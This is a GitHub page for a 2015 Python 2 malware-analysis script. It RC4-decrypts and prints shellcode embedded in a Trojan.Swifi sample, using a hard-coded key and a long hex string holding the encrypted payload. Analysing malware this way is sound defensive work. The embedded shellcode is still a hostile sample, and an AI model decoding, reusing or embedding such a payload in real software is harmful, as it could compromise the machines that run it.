-
Notifications
You must be signed in to change notification settings - Fork 11
Expand file tree
/
Copy pathTrojanSwifiShellcodeDecryptor.py
More file actions
77 lines (65 loc) · 8.21 KB
/
TrojanSwifiShellcodeDecryptor.py
File metadata and controls
77 lines (65 loc) · 8.21 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
#-------------------------------------------------------------------------------
# Name: Trojan.Swifi Shellcode Decryptor
# Purpose: This script decrypts a shellcode embedded in Trojan.Swifi (67ced26f2f578f7979642df6cd4097cd)
#
# Author: Ptr32Void
#
# Date: 20/06/2015
#-------------------------------------------------------------------------------
def string_to_hex(data):
i = 0
c = 0
string_hex = []
while i < len(data)-2:
string_hex.append( int( data[i:i+2], 16 ) )
c += 1
i += 2
return string_hex
def decode(shellcode, key):
i = 0
c = 0
shellcode_hex = string_to_hex(shellcode)
key_hex = string_to_hex(key)
_local5 = string_to_hex(key)
_local6 = len(_local5)
_local7 = 0;
_local3 = [None] * 256
_local4 = [None] * 256
while (_local7 < 0x0100):
_local3[_local7] = _local7
_local4[_local7] = _local5[(_local7 % _local6)]
_local7+=1
_local10 = 0
_local8 = 0
while (_local10 < 0x0100):
_local8 = (((_local8 + _local3[_local10]) + _local4[_local10]) & 0xFF)
_local9 = _local3[_local10]
_local3[_local10] = _local3[_local8]
_local3[_local8] = _local9
_local10+=1
_local12 = string_to_hex(shellcode)
_local7 = 0
_local10 = 0
index_0 = 0
_local11 = []
_local13 = 0
while (index_0 < len(_local12)):
_local7 = ((_local7 + 1) & 0xFF)
_local13 = ((_local13 + _local3[_local7]) & 0xFF)
_local9 = _local3[_local7]
_local3[_local7] = _local3[_local13]
_local3[_local13] = _local9
_local14 = ((_local3[_local7] + _local3[_local13]) & 0xFF)
_local9 = _local3[_local14]
_local11.append( (_local12[index_0] ^ _local9) )
index_0+=1
buff = ''
for c in _local11:
buff += chr(c)
print buff
def main():
key = "145f40a98ee3da4f6866472fcec968c39bd6172570459d59397716941b0ebc8e6fb807064d6d9d2fd5dd818fa6d7748c44f8fd3748c99b8838396e2544837f654f076b9e99090bf947efeb5cc2792c2198649129d8af67879d4203cebcb9773f463155dc57a0822f61d207356af45bc4f03c0c6b69b853fe8fc0e5f96f929fcaec134fbcb55248224d2ff6c82a462c0fa2154a05885f94edb6594e2009a1d686dafd0b4ea1f084773321065dd11eb16b0d794f10854f4622c02116517b32604b30345a364d82432c463b204c765ee11a0f68c03af5e8e74260a53eb1fe40e4c110ee372c32c2768e3800d683ee1f94af8d52e6473542d9c6ca6368768c7f6e67205a3c7d0a1e7240c06c5e02d82d0992f11e320c5e2264fbb84f5bed6253ec8e0c952a0954b9ed391c698f6093065e00a82633735285310469ce82748256b3dc02b4e24453e986c30adae74543dd1c85a1b620fbb71e4dd09c3f6dfe3355f9cb344071b611ba3cfe4d1488ee4f1d2b09d294d237f5ceadad1a6c4d147ed2db2a59b47f7cd469735d2ede362ee55e5841b373c8ccbc30a637aa9b79"
encoded_shellcode = "13562bcd8d6a0d486a083f4fb15552b7232f678b6f7ee6a7ac4697db3fb65b9ce5a70428eb982f6b418973960a47f388cc5aa28a03874649b18935c2e044d4bbeb43c3ac9170c72b0867c9228f9a877e111810060dbc25f40eb1c8bbc014e15e9ee683e1ec15b4cfb064a4080cb32bbe6cc820e6659961b02bf723d82695c67b9d7dd75da8de9907aa7b840a14bfa3b40f5d9bdbbfd2c8b24aeda823f1ac4e40cde0c63a16e6e36805566210e11249652b266e06b927189069cbca2985942163279eecc3c79390a33fe5c0cd153135b2c8a428b29f244d25b2ce6294703e1ffdbf6ce7a563ef0805dd7cb3c1e145db7e0e2631b93bd285cdb547839fde9781c43a3d89da60e48091875356df108f0bb33dfcc155fb1b4380154d81dc3d010fe8856b588c5ac0d57334c3c4edb93b680f67b72a8eb69bc365539de853e7b3cdb391bcf48c16d81b2f50f67011ab23eed5ef4ed6546fdd19f51ea8cbbf0be867e77ff29c81b65cc9219165f7da223b97f5fddb5bbe431b9d565a849b8ee29c952a79977b334f6f099ebfddd5305840999e877a005b0e1e03387a9cf6edf10ed8052916a371c7c640f087f23dc67c176551a59f9940b18a3a19fbcd24e71a66211d2210b3786793d327a61bc6114f4a2c54c600d596fdc7c13c34f3083e3b0af5898fb0290ada848958aae1bacd6862891af7e83a932eba684e53de4b7c966eb660a0a0437ecd41d2e7b349b097541a79b5f73b537fe3021c628474fc6ac2a52853500afb8ed81d59487fafe46a7cecd3732f2d7928f60c6c51b720a92beabb89c1bcb2866a75e0a80a4377a1d0d41eb6af9b499ef52442f06854d141becd359612867a9d70334e2b7c76bbb96685747f3cc268852bea7ae00409a4eb5d66bbbab36eec58d1e5da6c3ada1c23e7faf57d46b0b819bdce7cf27fbc0c37231b7c69adb73f94daa176ed8511f7eb978b4b2769911147f2180ad2a3679198acc8ea5df9fead3dea7e082db1b61eebd97aa567f44d712c5bc6482942ae1d381b62745f95ddf92f4ca40b388ba35c4acbc733e6ba3eba055e57fcceeeeb96e8158c9004f4181be79882a26453231360e32a9e31cdb41ea87b461df2a47f3c6c4fc9080eb7e9e5b6bfd91624909d3ad109eca7d9a7a555b3dc4df7cb7c900db80b2938cc1bf850deeeb3a96481715e7dbaae703401642d527f865678d8283161946da7665bd40a09edd971a23f76c76600e8a143dd91229828070deca9a80f4e5bbff2de777a18eebd4a9b0e553ff232c1d800f2b3464c5ab060a35bc6ec7890f5798c5f9580edb5474c2fbb9b3620f669ef79149df1d4036bd9f9aa5d6f7c3cc188ad6caf456ac9b51f589d1c5f5910c8c598c1873c62132993f4ec8fa130c628f48fb8d8a33968238a25f048b2ad4f55d3225b519a0ea8ebbb11b0697863897f7c23fea0df050cf56df3958063cbf7e57219a4c5884ce71efa0b724e2881c30e6167f366ffe404ad91605cffd4c89eb3c061436f8f5b6f15f8418225604ecd742f7758c4d811eb5bd728207d75fa07778b829dc360bd47dbb6d71066af714e9bf06a145fdf6579edda469d2efa329f77fc3331421d2ee72a640fb966477b0e3bcdcd222163ccdfc080fe3dc41a78d4404234e92af4b07aa62f41ce4ec7952fa4f1f46249dfcee69b5c8de135379353a6c94014f3d872cf65485424cd84bee75ed41cc20989e6d33559704b511310ea3ad32f85e2f324301514451eeb3c2d160b6089c46db2b8346ff8d163eab6ad629d01932f2a16974b780dc080eaecdaacbbf9ecd82e1ca3f2a0ffb9f42d48c8c9a87bba0e5053ed1ea1f9eacb6dd590891bf94d552f42cb34b6b3d057deb0f33d6eb05ee642ec2cf58f5eb9ca088ef3564aac07a8847ef6b11e6cedf6ac0853546b2f19d95fdd24b23bfd515e42782fba042333d20ebad9df31d5a71ebca513952a9ca02c3bedcb2761e923c44d31bfbfe99b283a544957c0788ced2921ad34a00330417ba8f504575a0a64790b2451b939bd7d5b5b896d449580d69f0e1b26f52e227781f0c1f8e7d757b4edd0ae7d74046d8f1f6404c65173a9a916a077071b4897ef451021e65428fcc6670cc267b8d511d48d7ffe7acfaa474526facec61b4484ad38dc65de3feb7fe27956d3070dc1a2e6831b4ac0fa697caa873290feab2f32019e82a1949dffa9fc0c5f61954b423ceb4585ee5de53be079f71f04cfefd76226f3df94ee525023f58cd9e96d56aeeeeb9df8bd321e10911f0cae63f94e48f0c895efbf6e1aadf67b4ba630cfec8bc9590975c9ed6003b21de46cbf40ceafe31753e8e148a2cce20ca389536312151e1e5dc20c49e847afad802f1e8e05d404366034b4afe3d38445598ecc87d4e72e8726d478eda1e4185aaa9a50d739a388ff248c07e8bb5392d4dd924218d9e9f411c00d2c4f6332ed92d2ee3bcd238a7e9e303625f7bb515cfeadcea1468b430e75c26ad6038b50fb4044a20d05110dea83e43f7c8ece51a2c2b81e0bfce334dd467086a9d6a806a19e67ac6fd63842ad7e1949afe4d8023f588d05c7de425e0362acb2f393d9d14fa18d95bc39cff977a962b321f23789cb7d07cc0c9d4aa6d0a881fad6b29f743a8bfa017a538426c46fcac25bd4e1e6a99cdf8556d315cfc871a065555e4c15b8606f85d8272f8652790d2e833f1277fcd03747d6afb97cdca52c6ed396844e5050859306076a872e17a83fa1c85633a6cbc1c806eac610637a5f3b64483aa14ebb644101874a06e6d75075e3c40948198d3aaf5aae1d4a81ca56713a151648c9a421d11bce2b2cec2a28f7bf648e30da3439de019d20939f30df00b270459e756a9d0763e5f1b41b3b77d56a921687b2a44d617d04a8800b31f685d973167827b3eba32acf869768c771e864e1a2dd8fe6ffe23a6077f67960cfa6d53d4025baa2dad522253a538a494fa5b2102afbdc76e3338a10c826902a62404991f5cdf03a939c755e0f1168696b2a1d09b96d0bd4dfa5361bfbd8070d3b3537d998b3110b50e480ed7c0836240b0b67eb29bd668d4bb40761d29ec761cb07573b86f8d015d295b72e6f6c9920e6d674644e7541a25666e33a2316d193e0776c19ebfe791db4f80ebd498157cf15341dada859a037785d1f7ba06466ed668831f3c9795a4477ba44b9d9ddd0e544d7aa2d4e7c33b9bc30219bf8d1d27eaba69255b46acb7e5d0ec6b01d0fb6e7c93e2d12f56cb604b53590e31c7e46ee73c32170ade42737f20e942a5d47f53d205852c095e935f1e62448d12a1a4f80cb259a77a8b6895e3864c291b8df972eda1853f215aa190ed11ff57c8a9c2ff93acb3d17b13fb45863d817df0ad9d146a5173298fc22d8e7d1db1181921ae8d49b2dc13a55b387a2380160e5220db5c0cebababa7b179fc486a7d4ac1736175f64ecd971afeac730044e719b4aa1d5cd95294c705c25278f4044ab0b0e032ff73dfb0ae6ae4352b2e289796fec60c9c84fbcf13f3d20e658a336b4958631836dc3174e2602b59209704cf9a7c3d79a12b0c0fe41d52107022039d04568b421f27ab67894804bd13da0a1bf6959dc1b46c9ded96b95841f771f0814ca223f7cfc8c6bdda45b4e5ea1a260ec78ec1e3b24589e7b16c91b209227e6b237469ccd3ea3fbd8b110aeea7114d96b37059dbf90a58205cfbd56abc7deb433e748520e43462a18e7516c67af39c500bf998187af372781992f0fd9a103af8d44e436a3d5ae00d9283ce5d8d7ed4385626469c0ae14020dc68fd05747e7364516cd055c1e36ae95430eb7cdc0093b8e16ff5c695abb8e46f3614d84e9d5ab220342bcdc4a8458af5ca93b5a30658c747d638a36737bda39c20dd8145784c5633e881c8175c8d2b0b5f6256b9fb3711a9c1ad5f23171c2f3db0e3337f26754753005385b3d6b18"
decode(encoded_shellcode, key)
if __name__ == '__main__':
main()